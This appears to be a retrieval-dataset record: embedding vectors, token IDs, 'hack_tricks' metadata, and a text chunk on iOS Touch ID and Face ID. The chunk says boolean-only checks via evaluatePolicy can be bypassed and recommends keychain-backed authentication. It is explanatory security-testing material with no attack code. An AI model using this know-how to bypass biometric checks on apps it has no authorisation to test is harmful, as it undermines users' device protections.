-0.15990622341632843, -0.19894839823246002, 0.010522628203034401, 0.4823923707008362, 0.006315947510302067, -0.28636303544044495, 0.4073200225830078, 0.19774319231510162, 0.05393050238490105, 0.9155869483947754, -0.8044965267181396, -0.3850625157356262, -0.2320803701877594, 0.7665377259254456, -0.8423693776130676, -0.8323619961738586, 0.2767546474933624, 0.8640880584716797, 0.5242360830307007, 0.021464131772518158, -0.42872095108032227, -0.024996289983391762, 0.6070289611816406, -0.03254640847444534, 0.4351919889450073, -0.1465432494878769, -0.5354611277580261, 1.0723625421524048, -0.627105712890625, 0.11195223778486252, 0.09927598387002945, 0.3319782018661499, -0.012906086631119251, -0.37344273924827576, -0.45563700795173645, 0.07317256927490234, 0.33180972933769226, -0.7648580074310303, 0.9881906509399414, 0.3971675634384155, 0.428009957075119, -0.625186562538147, 0.12365006655454636, -0.7802098989486694, 0.5708393454551697, 0.5880063772201538, -0.01745944656431675, 0.0039812796749174595, 0.5490021109580994, 0.43250125646591187, -0.4748411476612091, 0.30457478761672974, 0.3538423478603363, 0.10980051010847092, -0.23524945974349976, 0.21874277293682098, -0.34996297955513, -0.0365627259016037, 0.19909554719924927, 0.05418753623962402, 0.24095331132411957, -0.2226967066526413, 0.32389381527900696, 0.1942712813615799, -0.053474605083465576, 1.1630315780639648, -0.3714255392551422, 0.9190539121627808, 0.00489110266789794, -0.04188604652881622, 0.09465447813272476, -0.41802799701690674, -0.7170553803443909, 0.10537797212600708, 1.2901297807693481, 0.25262272357940674, 0.19196155667304993, 0.603003740310669, -0.12468258291482925, -0.21895655989646912, 0.40974825620651245, -0.0820784792304039, -0.45461395382881165, -0.1371106207370758, 0.02443455159664154, -0.7971819043159485, -0.9787118434906006, -0.06432802230119705, 0.03560735285282135, -0.014265868812799454, 0.8539735078811646, -0.1802942007780075, 0.7412835359573364, -0.5351050496101379, 0.5798749327659607, -0.6843114495277405, 0.02570616453886032, 0.3034108579158783, -0.3640102446079254, -1.175395131111145, 0.6864250302314758, 0.1027979925274849, 0.0339873731136322, 0.2687516212463379, 0.7671032547950745, 0.5040275454521179, 0.4855223000049591, -0.340589702129364, -0.3988957405090332, -0.3478985130786896, -0.279674768447876, -0.2715054452419281, -0.3720620572566986, -0.04534631967544556, -0.44227713346481323, 0.4186292886734009, -0.3095725476741791, -0.2047586441040039, -0.1837523877620697, -0.0493970587849617, -0.27004489302635193, -0.4651917517185211, 0.6859921216964722, -0.4146762490272522, -0.5080472230911255, -0.0620482861995697, 0.21454010903835297, 0.16269519925117493, 0.5073889493942261, -0.40557268261909485, -0.8443650603294373, -0.2002115100622177, -0.567986249923706, -0.3877851665019989, 1.147637128829956, -0.6647080779075623, 0.2503568232059479, 0.012441062368452549, -0.5040413737297058, -0.7543668150901794, -0.007936597801744938, -0.46435871720314026, -0.5542941689491272, 0.18462692201137543, 0.19814153015613556, 0.6567721962928772, 0.8264353275299072, -0.10047273337841034, 0.07304678112268448, 0.4887095093727112, 0.6876720786094666, -0.673106849193573, 0.7015478610992432, 0.325945645570755, 0.41670697927474976, 0.22194157540798187, -0.5116209983825684, 0.5733595490455627, -0.30574238300323486, -0.07929904013872147, -0.3994062840938568, -0.3161010146141052, -0.7429660558700562, -0.03734499588608742, 0.392525315284729, -0.14312805235385895, -0.446738064289093, -0.09939780086278915, -0.9652433395385742, 0.3039012849330902, -0.5449686050415039, 0.32012179493904114, -0.14539143443107605, 0.29932016134262085, 0.07270041853189468, 0.126065194606781, 0.02877167798578739, -1.5057018995285034, 4.571372032165527, 0.629416823387146, -0.3713492155075073, 0.6357280611991882, 0.5791425704956055, 0.5261238813400269, 0.8835228085517883, -0.8737362623214722, 0.16341522336006165, -0.1285160481929779, -0.05792619660496712, -0.04071977362036705, 0.49910369515419006, 0.11373205482959747, 0.20356453955173492, 0.4200578033924103, -0.27571722865104675, 0.5622700452804565, 0.778700590133667, -0.9635510444641113, -0.6419572830200195, 0.21415753662586212, -0.5082578659057617, 0.40382120013237, 0.5620893836021423, 0.02877636067569256, 0.19312255084514618, -0.41557762026786804, -0.4431047737598419, -0.21992628276348114, 0.1579531878232956, -0.21719716489315033, 0.35660502314567566, -0.47129300236701965, -1.1060919761657715, 0.44735896587371826, 0.4481925666332245, -1.0397111177444458, -0.4050694704055786, -0.07928715646266937, -0.014430897310376167, -0.3138170838356018, 0.09185484051704407, -0.1981155425310135, 0.49002236127853394, 0.8439615368843079, -0.8175048828125, 0.7840355038642883, 0.7842578887939453, -0.449389785528183, 0.5198515057563782, 0.05326349660754204, 0.5553215742111206, 0.20121897757053375, -0.5808661580085754, -0.15972773730754852, -0.16776229441165924, -0.19369257986545563, 0.24158677458763123, -0.0813891664147377, 0.5717893242835999, -0.5589417815208435, -0.12269405275583267, -0.019957024604082108, -1.0738744735717773, 0.6437278985977173, -0.06688426434993744, 0.6713109016418457, -0.5244067311286926, -0.07407095283269882, -0.0537046454846859, -0.217860147356987, -0.6077954769134521, 0.03646345064043999, 0.8315989971160889, -0.20258472859859467, -0.3348156213760376, 0.21765609085559845, 0.6199561357498169, -0.6153107285499573, -0.06227521598339081, -0.7167162299156189, -0.8046191334724426, 0.5291600227355957, 0.8455962538719177, 0.39114612340927124, -0.003392598358914256, -0.41151928901672363, -0.25702884793281555, 0.2698512077331543, 0.40376710891723633, 0.2541687786579132, -0.5363442897796631, 0.2060116082429886, -0.06117495894432068 ]
[ 2005, 2019, 1036, 12935, 2290, 1012, 2502, 10497, 2937, 1036, 3590, 16313, 3643, 1064, 1013, 1059, 29379, 3945, 2005, 2898, 5164, 1005, 1042, 1032, 1014, 2080, 1032, 1014, 2080, 1032, 1014, 1005, 1064, 1013, 1060, 21461, 8889, 22394, 3945, 2005, 2002, 2595, 5164, 1064, 1013, 1062, 8117, 4098, 3945, 2005, 7817, 1997, 2445, 2946, 1012, 1012, 1012, 2448, 7292, 3638, 4106, 3762, 2478, 1054, 2475, 27439, 2050, 2017, 2064, 17908, 1998, 22459, 1996, 10439, 1005, 1055, 3638, 2096, 2770, 1998, 2302, 11303, 2000, 15653, 2009, 1012, 2005, 2742, 1010, 2017, 2089, 2448, 1996, 3025, 3945, 10954, 2013, 1054, 2475, 27439, 2050, 1998, 3945, 1996, 3638, 2005, 1037, 5164, 1010, 2002, 18684, 3207, 6895, 9067, 5300, 1010, 4385, 1012, 2043, 2725, 2061, 1010, 3342, 2000, 17463, 10497, 1996, 3945, 3094, 1006, 1998, 2151, 2060, 1054, 2475, 27439, 2050, 3563, 10954, 1007, 2007, 1037, 10457, 27067, 1032, 2044, 3225, 1996, 5219, 2007, 1054, 2475, 10424, 8524, 1024, 1013, 1013, 18833, 1013, 1013, 1026, 2171, 1035, 1997, 1035, 2115, 1035, 10439, 1028, 1012, 3714, 19888, 9888, 24667, 2099, 3145, 2968, 6194, 14045, 9797, 3828, 7591, 2951, 1999, 1996, 2334, 5527, 1998, 4372, 26775, 22571, 2102, 2009, 2007, 1037, 3145, 2524, 16044, 2094, 1013, 21425, 1999, 1996, 3642, 1012, 2023, 5807, 1005, 1056, 2022, 2589, 2004, 2070, 7065, 2545, 2075, 2071, 3499, 17857, 2000, 14817, 1996, 18777, 2592, 1012, 2224, 1997, 16021, 29150, 1998, 1013, 2030, 2139, 28139, 12921, 13792, 24844, 18349, 7347, 5807, 1005, 1056, 2224, 2139, 28139, 12921, 13792, 2000, 4685, 3166, 6648, 14148, 1010, 3573, 2030, 4604, 2951, 1012, 2070, 1997, 2122, 13792, 2024, 1024, 22110, 2549, 1010, 9108, 2549, 1010, 9108, 2629, 1010, 21146, 2487, 1012, 1012, 1012, 2065, 23325, 2229, 2024, 2109, 2000, 3573, 20786, 2015, 2005, 2742, 1010, 23325, 2229, 26128, 1011, 2486, 13070, 2323, 2022, 2109, 2007, 5474, 1012, 4638, 10760, 2364, 14148, 2000, 4685, 2065, 2000, 2424, 2065, 2017, 2064, 2424, 2524, 16044, 2094, 20786, 2015, 1013, 7800, 1999, 1996, 3642, 1010, 2030, 2065, 2216, 2024, 21425, 1010, 1998, 2065, 1996, 3642, 2003, 2478, 2070, 2332, 1997, 5410, 19888, 9888, 13792, 1012, 2009, 1005, 1055, 5875, 2000, 2113, 2008, 2017, 2064, 8080, 2070, 19888, 2080, 8860, 8073, 2478, 22224, 2007, 1024, 16380, 8080, 19888, 29278, 2062, 2592, 2055, 16380, 19888, 13705, 17928, 2015, 1998, 8860, 3229, 24471, 2140, 27280, 10760, 3231, 2121, 2323, 2022, 5204, 2008, 2334, 27280, 2323, 2467, 2022, 16348, 2012, 1037, 6556, 2203, 8400, 2030, 2241, 2006, 1037, 19888, 13705, 10968, 1012, 17857, 2064, 4089, 11826, 2334, 27280, 2065, 2053, 2951, 5651, 2013, 1996, 27280, 2832, 1012, 1996, 2334, 27280, 7705, 3640, 1037, 2275, 1997, 17928, 2015, 2005, 9797, 2000, 7949, 2019, 27280, 13764, 8649, 2000, 1037, 5310, 1012, 1999, 1996, 6123, 1997, 7176, 2000, 1037, 6556, 2326, 1010, 2009, 2003, 2825, 1006, 1998, 6749, 1007, 2000, 21155, 1996, 3145, 24925, 2078, 2005, 14972, 2334, 27280, 1012, 1996, 4344, 16550, 8909, 13617, 2003, 3498, 2011, 1996, 5851, 2368, 23650, 3036, 8872, 3217, 9623, 21748, 1998, 2515, 2025, 14451, 4344, 16550, 2951, 2000, 2151, 2060, 3033, 1997, 1996, 2291, 1012, 2279, 2000, 3543, 8909, 1010, 6207 ]
hack_tricks
43.txt
19
introduced face id : which allows authentication based on facial recognition. developers have two options for incorporating touch id / face id authentication : localauthentication. framework is a high - level api that can be used to authenticate the user via touch id. the app can't access any data associated with the enrolled fingerprint and is notified only whether authentication was successful. security. framework is a lower level api to access keychain services. this is a secure option if your app needs to protect some secret data with biometric authentication, since the access control is managed on a system - level and can not easily be bypassed. security. framework has a c api, but there are several open source wrappers available, making access to the keychain as simple as to nsuserdefaults. please be aware that using either the localauthentication. framework or the security. framework, will be a control that can be bypassed by an attacker as it does only return a boolean and no data to proceed with. see don't touch me that way, by david lindner et al for more details. local authentication frameworkdevelopers can display an authentication prompt by utilizing the function evaluatepolicy of the lacontext class. two available policies define acceptable forms of authentication : deviceownerauthentication ( swift ) or lapolicydeviceownerauthentication ( objective - c ) : when available, the user is prompted to perform touch id authentication. if touch id is not activated, the device passcode is requested instead. if the device passcode is not enabled, policy evaluation fails. deviceownerauthenticationwithbiometrics ( swift ) or lapolicydeviceownerauthenticationwithbiometrics ( objective - c ) : authentication is restricted to biometrics where the user is prompted for touch id. the evaluatepolicy function returns a boolean value indicating whether the user has authenticated successfully. which means that it can be easily bypassed ( see below ) local authentication using keychainthe ios keychain apis can ( and should ) be used to implement local authentication. during this process, the app stores either a secret authentication token or another piece of secret data identifying the user in the keychain. in order to authenticate to a remote service, the user must unlock the keychain using their passphrase or fingerprint to obtain the secret data. the keychain allows saving items with the special secaccesscontrol attribute
[ 0.09292975068092346, -0.017839917913079262, -0.4494560956954956, 0.270694762468338, -0.05843733251094818, -0.06686306744813919, 0.5221880078315735, -0.02293502353131771, 0.32364246249198914, 0.5692715644836426, 0.18562614917755127, 0.007310759741812944, -0.6844700574874878, -0.21251335740089417, -0.7333891987800598, -0.08581507205963135, -0.5960565209388733, 0.49740663170814514, -0.4019516110420227, -0.38483503460884094, 0.3886907398700714, 0.14632382988929749, -0.36622434854507446, -1.1583020687103271, -0.25758782029151917, 0.6866098642349243, 0.5297666788101196, -0.18391455709934235, 0.320112407207489, 0.2698725163936615, -0.26066917181015015, 0.09186192601919174, 0.39759522676467896, -0.5429847240447998, -0.0036750754807144403, -0.18721844255924225, 0.5751110911369324, -0.6131653189659119, 0.03140902519226074, -0.44129934906959534, 0.6220287084579468, -0.02455808036029339, -0.041913289576768875, -0.14309068024158478, -0.4094102382659912, -0.299275279045105, -0.5621769428253174, -0.34760183095932007, -0.2648359537124634, -0.327642023563385, -0.021510755643248558, 0.038037024438381195, -0.04472411796450615, 0.23029324412345886, 0.33245226740837097, -0.05388471484184265, 0.2577458620071411, -0.30003783106803894, 0.20915070176124573, 0.3276253938674927, -0.15873412787914276, 0.5055892467498779, 0.049110207706689835, -0.8375548720359802, -0.4269999563694, 0.0046439990401268005, -0.011139411479234695, -0.3174196779727936, -0.20981556177139282, -0.6986938714981079, -0.020413998514413834, -0.038778096437454224, -0.4393368065357208, -1.1698514223098755, -0.3212035000324249, -0.0012292196042835712, -0.003562298370525241, -0.4880202114582062, 0.43264198303222656, 0.41970041394233704, 0.43728092312812805, 0.6554720997810364, 0.08077827095985413, 0.17054477334022522, -0.4820273220539093, 0.4280149042606354, 0.476218581199646, 0.27309489250183105, -0.6495124101638794, -0.38497331738471985, 0.30461129546165466, 0.6369149088859558, -0.6742314100265503, -0.4639962315559387, 0.8020708560943604, 0.8139117956161499, 0.031127484515309334, 0.4583199620246887, 0.3579340875148773, -0.3245007395744324, 0.44830211997032166, 0.24944743514060974, 0.43274959921836853, 0.27688390016555786, 0.004558490123599768, 0.3320401608943939, 0.24105681478977203, -0.6042616963386536, -0.290086030960083, -0.5062078237533569, 0.060113415122032166, -0.3964417576789856, 0.6186465620994568, -0.3456510305404663, -0.2702576816082001, 0.5087162256240845, 0.7627134919166565, 0.47848257422447205, -0.03049948252737522, 0.6550795435905457, 0.04827527701854706, -0.08192555606365204, 0.6144396066665649, 0.03490161523222923, 0.3264405429363251, 0.17301468551158905, 0.9978085160255432, -0.2854151725769043, -0.3618184030056, -0.5343405604362488, -0.17527274787425995, -0.23735381662845612, -0.11962877213954926, 0.9556512236595154, -0.6056241393089294, -0.35699161887168884, 0.11539942771196365, 0.13775426149368286, 0.7150880694389343, -0.8271016478538513, -0.305742084980011, 0.8965186476707458, 0.2152501791715622, 0.6970118284225464, 0.48500311374664307, -0.3744708299636841, -0.8438594937324524, -0.24451138079166412, -0.1717129349708557, -0.17155581712722778, -0.06844072788953781, 0.6436852812767029, 0.7108078002929688, -0.11928556859493256, -0.9339075088500977, 0.373527467250824, -0.8660001754760742, 0.5294304490089417, -0.21447543799877167, -0.06706023216247559, -0.15776321291923523, 0.7881548404693604, 0.1702628880739212, 0.3498057425022125, -0.16949032247066498, -0.15179923176765442, -0.435637891292572, 0.3513771593570709, 0.3042115867137909, -0.03795376792550087, 0.22109703719615936, 0.046784043312072754, 0.23888488113880157, -0.22732417285442352, 0.8980357050895691, 0.8493771553039551, 0.18110576272010803, -0.06219969317317009, 0.2868824601173401, 0.5849581956863403, -0.09643933922052383, 0.3865181505680084, 0.26965805888175964, 0.8892048001289368, 0.04822922870516777, -0.05252637341618538, -0.1891663521528244, -0.7940911650657654, 0.23340171575546265, -0.22284366190433502, -0.5929553508758545, 0.7026104927062988, -0.884804368019104, 0.6684662103652954, 0.830643355846405, -0.10011836886405945, -0.6977575421333313, -0.03624841198325157, -0.2096814662218094, -1.539076805114746, -0.732664167881012, 0.281503289937973, 0.0657491609454155, 0.17484189569950104, -0.15626421570777893, -0.552386999130249, 1.045305609703064, 0.062042444944381714, -0.6421551704406738, 0.7706515192985535, 0.3528503477573395, -0.4674258828163147, -0.7463582158088684, -0.4154157340526581, 0.17702454328536987, 0.15328186750411987, 0.017535846680402756, 0.65640789270401, -0.07364511489868164, 0.1796395182609558, -0.011073155328631401, 0.4111100733280182, 0.2468806356191635, 0.36083975434303284, -0.797911524772644, 0.14888954162597656, 0.4646098017692566, 0.019854385405778885, 0.3863590359687805, 0.4664347767829895, 0.2565932869911194, 0.8005782961845398, 0.5742353796958923, 1.0221742391586304, 0.14198780059814453, -0.04082305356860161, 0.030902795493602753, 0.06789983808994293, -0.11905772984027863, -0.17624439299106598, -0.2479822039604187, 0.7057929635047913, 0.9391680359840393, 0.4933389127254486, 0.28234678506851196, -0.09709707647562027, 0.2235262095928192, 0.2647709250450134, 0.36984872817993164, 0.5817594528198242, -0.2107418328523636, 0.2933914363384247, 0.17306286096572876, -0.21671946346759796, -0.9342504143714905, -0.4506792426109314, 0.6306749582290649, 0.3454514741897583, -0.29509633779525757, -0.6473411917686462, 0.031648460775613785, -0.0325365774333477, 0.30914878845214844, -0.06737518310546875, 0.21207217872142792, 0.25998589396476746, 0.2535177767276764, 0.3003394901752472, -0.31692424416542053, -0.5788704752922058, -1.0156463384628296, -0.268036425113678, -1.1024127006530762, -0.35194262862205505, -1.1876189708709717, -0.3384249210357666, 0.23279854655265808, -0.354408860206604, 1.3719704151153564, -0.5116812586784363, -0.7691792249679565, -0.4798569679260254, -0.008679339662194252, 0.6119746565818787, 0.25888681411743164, 0.5267321467399597, -0.6847488880157471, 0.005869295913726091, 0.1759483367204666, 0.5089648962020874, 0.11850860714912415, -0.12321608513593674, 0.3377376198768616, -0.18385837972164154, 0.360822856426239, -0.7699351906776428, 0.7802351117134094, 0.20957288146018982, -0.48042938113212585, 0.4345298111438751, 0.3085172176361084, 0.4967801868915558, -0.13121192157268524, 0.041785191744565964, -0.944472074508667, 0.06384743750095367, -0.03616999462246895, -0.4974174499511719, 0.573602557182312, 0.546279788017273, -0.06698508560657501, 0.49228930473327637, 0.014793594367802143, 0.6296075582504272, -0.4956834614276886, 0.4197165369987488, 0.4846258759498596, -0.1118127852678299, 0.11382190883159637, -0.29384103417396545, -0.22760774195194244, 0.10927072167396545, -0.20021705329418182, -0.10003280639648438, -0.20898906886577606, 0.26014649868011475, -0.4591483473777771, -1.186699628829956, 0.3427439033985138, -0.6120748519897461, -0.5201508402824402, -0.21158157289028168, -0.4152493178844452, 0.9427571892738342, -0.34838640689849854, 0.2099008560180664, 0.4806521534919739, -0.27917221188545227, 0.6999235153198242, 0.1042250543832779, -0.25836899876594543, -0.5333962440490723, 0.5341375470161438, -0.1908424198627472, -0.015574775636196136, 0.6179728507995605, -0.3015827536582947, -0.39379727840423584, -0.16849581897258759, -0.37541043758392334, -0.5251818299293518, -0.3459102511405945, 0.0038667276967316866, -0.127118319272995, 0.1019979864358902, 0.7894739508628845, -0.8549345135688782, -0.384448766708374, -0.2062995433807373, 0.7619785070419312, 0.4340582489967346, -0.4381387233734131, -0.005876072682440281, 0.26705580949783325, 0.23391760885715485, -0.5097054839134216, -0.10342367738485336, 0.6147069931030273, 0.02860545739531517, 0.06207357347011566, 0.43098971247673035, -0.6093295216560364, 0.21934926509857178, 0.49082130193710327, -0.26605311036109924, -0.9309988617897034, 0.609426736831665, 0.007346378639340401, 0.40655648708343506, 0.13884373009204865, 0.5057129263877869, -0.2200385481119156, -0.2861129939556122, 0.6457914710044861, -0.0017129454063251615, -0.5169504284858704, -0.5891934037208557, -0.42950963973999023, -0.29447615146636963, -0.28083980083465576, 0.46176421642303467, 0.012685558758676052, -0.5375628471374512, -0.27241382002830505, -0.6355867385864258, -0.12716977298259735, 0.3245932161808014, 0.5738440155982971, 0.7488051056861877, 0.030747340992093086, 0.8587839603424072, 0.7744945287704468, -0.38110440969467163, 0.4515012204647064, -1.0988892316818237, 0.20565730333328247, -0.5253008008003235, 1.082291603088379, -0.45750153064727783, -0.7808051109313965, -0.19226539134979248, -0.39344802498817444, -0.543574869632721, 0.03493085131049156, -0.21604906022548676, -0.2121007740497589, -0.41314202547073364, -0.2143082171678543, -0.18263667821884155, 0.6375892162322998, -0.517048716545105, 0.18813839554786682, -0.7363792657852173, 0.06676289439201355, 1.3179255723953247, -0.1201154887676239, -0.3222091794013977, -0.4480096697807312, -0.00026080288807861507, -0.029405785724520683, -0.09357677400112152, -0.08805892616510391, -0.46299275755882263, -0.5013318657875061, -0.32166656851768494, 0.05613407492637634, 0.4236200451850891, -0.15990658104419708, 0.6114928126335144, -0.8977223634719849, 0.2528911232948303, 0.6122304201126099, -0.11687789112329483, -0.7691328525543213, 0.15138264000415802, 0.23862162232398987, -0.14912433922290802, 0.7783118486404419, -0.6934469938278198, -0.4789705276489258, 0.3049378991127014, -0.44178029894828796, 0.773800790309906, -0.849922239780426, -0.2264486700296402, 0.1148989275097847, 0.3369942903518677, -0.07153746485710144, 0.7991945743560791, -0.6509285569190979, 0.4964408874511719, 0.12342970073223114, 0.05465937778353691, 0.040142323821783066, 0.1456785649061203, 0.7694088220596313, -0.3293208181858063, 0.20006701350212097, 0.5883460640907288, 0.34036415815353394, -0.11877316981554031, 0.19849945604801178, -0.4312073290348053, -0.9600734114646912, 0.4423493444919586, -0.35155588388442993, 0.47016796469688416, -0.08682219684123993, -0.1360578089952469, 0.25057289004325867, -0.6535608768463135, 0.4153589904308319, -0.23876243829727173, 0.6492673754692078, -1.2572952508926392, -0.3785734474658966, 0.14211733639240265, 0.19470568001270294, 0.13421426713466644, 0.850960910320282, 0.05449138209223747, -0.12216329574584961, -0.08212289214134216, 0.16900354623794556, -0.49027928709983826, -0.6020346879959106, -0.812833309173584, 0.0329500213265419, 0.020596936345100403, -0.6835876703262329, 0.5268983244895935, 0.7772418856620789, -0.5368679761886597, 0.58442622423172, 0.025531629100441933, 0.19051550328731537, -0.7175548076629639, -0.021922243759036064, -0.6137997508049011, -0.4681895077228546, -0.2746465504169464, 0.8823183178901672, -0.29138708114624023, -0.01789448782801628, -0.0775621309876442, 0.20892566442489624, 0.48680809140205383, -0.0037780068814754486, -0.7777730822563171, 0.42094868421554565, 0.0353131927549839, -0.4521455764770508, 0.26667651534080505, 0.8028654456138611, 0.087640680372715, -0.2981230616569519, -0.4319455921649933, -0.08908011019229889, -0.95887690782547, -0.5655130743980408, 0.22759084403514862, -0.524419903755188, 0.08555004000663757, -0.8017372488975525, -0.3374917209148407, 0.08388688415288925, 0.9548612833023071, 0.20607823133468628, -0.32154321670532227, 0.1980060338973999, -0.4624624252319336, 0.42738112807273865, 0.028783639892935753, -0.9035224318504333, -0.5673604607582092, -0.5328426957130432, -0.5747424960136414, 0.4396464228630066, 0.11369942128658295, -0.30395764112472534, 0.12952086329460144, 0.2908700108528137, 0.02245430275797844, 0.02041887678205967, -0.6243802309036255, -0.6415933966636658, 0.1531444489955902, 0.11432062834501266, -0.3922024369239807, 0.9033715128898621, -0.5118526816368103, 0.46964457631111145, 0.14731205999851227, 0.15275435149669647, 0.10006654262542725, -0.6564381718635559, -0.28012245893478394, 0.26173511147499084, 0.2309277504682541, -0.9077592492103577, -0.7161129713058472, 0.02564830705523491, 0.3132818043231964, 0.4649907052516937, 0.05490647256374359, -0.6891797780990601, 0.16759899258613586, -0.9935673475265503, -1.4404172897338867, 0.17713749408721924, -0.22414173185825348, 0.25414565205574036, -0.049690235406160355, -0.0838242694735527, -0.2499072551727295, 0.3155549168586731, -0.38796600699424744, 0.7858885526657104, 0.2560441493988037, 0.09964240342378616, -0.46158722043037415, 0.9678000211715698, 0.4871532618999481, -0.019341547042131424, 0.08711473643779755, -0.23399730026721954, 0.33917129039764404, -0.24690888822078705, -0.7037768959999084, -0.3991275429725647, -0.8112158179283142, 0.19015459716320038, 0.004586978815495968, -0.17152920365333557, 0.6070685982704163, -0.3055267632007599, -0.4737691879272461, -0.04128674045205116, 0.05006563663482666, -0.32337480783462524, 0.22917450964450836, 0.8504462242126465, 0.59330815076828, -0.10686223953962326, -0.4448908567428589, 0.11052082479000092, -0.3112342655658722, -0.2574217617511749, 0.9419130086898804, 0.26164665818214417, -0.5296797156333923, 1.1708539724349976, 0.5848727226257324, -0.7810718417167664, -0.34128209948539734, -0.2862989008426666, -0.2727072834968567, -0.2002808153629303, -0.3919983208179474, -0.03876222297549248, 0.10405401885509491, -0.19125770032405853, -0.03886937350034714, 0.22308839857578278, -0.001403744681738317, -0.11662733554840088, -0.4247974753379822, 0.6286996006965637, -0.38751158118247986, -0.46068671345710754, 0.4453129470348358, -0.8660909533500671, -0.6402280330657959, -0.7002105712890625, 0.2766417860984802, 0.24313582479953766, -0.13926494121551514, 1.0364727973937988, -0.1708219349384308, -0.026179365813732147, 0.36833468079566956, -0.22702322900295258, 0.7082793116569519, 0.07710564881563187, 0.022422458976507187, 1.2311650514602661, 0.46805641055107117, -0.2592751979827881, -0.6297329068183899, 0.9135282039642334, 0.0321517214179039, -0.02249646745622158, -0.7731878757476807, 0.0560789592564106, 0.02361590415239334, 0.43102070689201355, -0.3724534809589386, -0.36507555842399597, -0.5836278200149536, -0.6189122200012207, -0.023738373070955276, -0.26087042689323425, -0.2615470588207245, -0.15430350601673126, 0.10653507709503174, -0.13084612786769867, -0.2384704053401947, -0.34494635462760925, 0.07215386629104614, -0.7874544262886047, -0.3258967399597168, -0.3705044984817505, 0.19838593900203705, -0.5143718719482422, -0.9053182005882263, -0.4962250888347626, -0.40582722425460815, -0.3909560441970825, -0.2789154350757599, -0.15896227955818176, -0.03599032014608383, -0.5467500686645508, 0.10508072376251221, -1.0874818563461304, 0.309905081987381, -0.07264401018619537, -0.7891807556152344, -0.5062234401702881, 0.8465010523796082, 0.1995994746685028, -0.5672486424446106, 0.318720281124115, 0.8761060237884521, 0.39325153827667236, -0.7733399271965027, -0.05760406330227852, 0.07213526219129562, 0.2052673101425171, -0.14821836352348328, 0.4186064600944519, -0.0014979607658460736, 0.0485617071390152, -0.2809925377368927, -0.36278852820396423, 0.08852628618478775, -0.8040264248847961, -0.02482806332409382, 0.6797837615013123, 0.011194580234587193, 0.4003809988498688, 0.17071597278118134, 0.24166344106197357, 0.3795927166938782, -0.5121033191680908, 0.6637486219406128, 0.6414381265640259, -0.04913840442895889, 0.4142601191997528, 0.30779600143432617, 0.28252965211868286, -0.9927300214767456, 0.30902257561683655, -0.22677470743656158, -0.9717196226119995, -0.02542322874069214, 0.03201008960604668, -0.35526329278945923, -0.2015657275915146, -0.17162226140499115, 0.6842581033706665, -0.1802673637866974, 0.2991240918636322, -0.07901868224143982, 0.7140308022499084, 0.015110310167074203, -0.7088311910629272, 0.15010301768779755, -0.8981823921203613, -0.5806590914726257, 0.36624643206596375, 0.14583919942378998, -0.6859249472618103, -0.6869333386421204, 0.30212801694869995, 0.2668546736240387, 0.43832871317863464, -0.1371011734008789, 0.4680423140525818, -0.19313287734985352, 0.00537458760663867, 0.6308201551437378, -0.6221700310707092, 0.27145251631736755, -0.4142807424068451, 0.8210704922676086, -0.840233564376831, -1.2512528896331787, 0.3609567880630493, 0.5518569350242615, 0.49403414130210876, -0.1646374762058258, -0.3887592852115631, 0.03592882305383682, 0.6298190951347351, -0.35593700408935547, 0.5365018248558044, 0.027803977951407433, -1.048122525215149, 0.4942208230495453, -0.02893761545419693, 0.33910173177719116, 0.23300470411777496, 0.11928395926952362, -0.18611909449100494, -0.3702709674835205, -0.5565786361694336, -0.07108724117279053, -0.09732425212860107, -0.2616623640060425, 0.9678739905357361, 0.1738557368516922, 0.41057437658309937, -0.7428929209709167, -0.06159631907939911, -0.5427130460739136, 0.6771198511123657, 0.18742553889751434, -0.5439799427986145, 0.15030641853809357, 0.1546715646982193, 0.3166964054107666, -0.2928994297981262, -0.013856875710189342, 0.5410944223403931, 0.39368975162506104, -0.0847218781709671, 0.07126466184854507, -0.04068734869360924, 0.05615504831075668, -0.27707144618034363, -0.10798333585262299, -0.31151896715164185, 0.4486334025859833, 0.11309923231601715, -0.07694025337696075, -0.3133558928966522, 0.677553653717041, -0.466116726398468, 0.5386499166488647, 0.07595673203468323, 0.25646689534187317, 0.26508086919784546, -0.5154614448547363, -0.282190203666687, 0.28784817457199097, 1.5196627378463745, -0.15030382573604584, 0.366527259349823, 0.6087412238121033, -0.6459844708442688, -0.26885753870010376, 0.22147537767887115, 0.3840249180793762, -0.8743703365325928, -0.05903558060526848, 0.6416860818862915, -0.7925147414207458, -0.29762956500053406, 0.5257342457771301, 0.3786391317844391, -0.6434751152992249, 0.15443672239780426, -0.6247925758361816, 0.21675115823745728, -0.21180479228496552, 0.4956806004047394, -0.03629010543227196, -0.15986575186252594, 0.1191849634051323, -0.7727885246276855, -0.8764535188674927, 1.2039216756820679, -0.3912692666053772, 0.4732075333595276, 0.1254175901412964, 0.6005824208259583, 0.8742707371711731, 0.3195655047893524, 0.025697283446788788, -0.75904381275177, -0.2295614629983902, 0.07681722193956375, -0.009982619434595108, -0.10824326425790787, -0.4432179927825928, -0.2618049383163452, 0.36464133858680725, -0.16522182524204254, 0.21479877829551697, -0.5062695145606995, -0.11471729725599289, -0.5156777501106262, -0.592256486415863, 0.49643346667289734, 0.10564816743135452, -0.6325444579124451, 0.5785176753997803, 0.05109439417719841, -0.025770101696252823, 0.8603019714355469, -0.23801513016223907, -0.23537276685237885, -0.2600567042827606, -0.6686249375343323, -0.2474660724401474, 1.028674602508545, 0.04505915194749832, -0.17828530073165894, 0.6433860063552856, -1.0862354040145874, -0.20271016657352448, 0.5704391002655029, -0.3024742603302002, -0.6334879994392395, 0.003735580248758197, 0.21641334891319275, 0.8507797718048096, 0.31873396039009094, -0.46613651514053345, -0.06051030382514, 0.623362123966217, 0.370753675699234, -0.7821921110153198, 0.5325987339019775, 0.539914608001709, 0.12815020978450775, 0.08109013736248016, -0.20609135925769806, 0.7975642085075378, -0.19805891811847687, 0.066806361079216, -0.2535252869129181, -0.37866494059562683, -0.6000154614448547, -0.03184247761964798, 0.17776910960674286, -0.25129178166389465, -0.3926820755004883, -0.10664322227239609, -0.36818087100982666, 0.15166187286376953, -0.5603321194648743, 0.5935972929000854, 0.021325835958123207, -0.21546486020088196, 0.3681551516056061, 0.03923315927386284, 0.8456824421882629, -1.4642977714538574, 4.442575931549072, 0.396752268075943, -0.23650339245796204, 0.2563219666481018, 0.1340368539094925, 0.8774511814117432, 1.1694016456604004, -0.3246661126613617, 0.035667646676301956, -0.30129310488700867, 0.721723198890686, -0.30627331137657166, 0.9393964409828186, -0.2231273055076599, 0.11003235727548599, 0.19487826526165009, -0.398896187543869, -0.10244786739349365, 0.45743903517723083, -0.7572656273841858, -0.539928138256073, -0.09469708800315857, -0.3689160645008087, 0.6140283346176147, 0.7188030481338501, 0.5809916257858276, 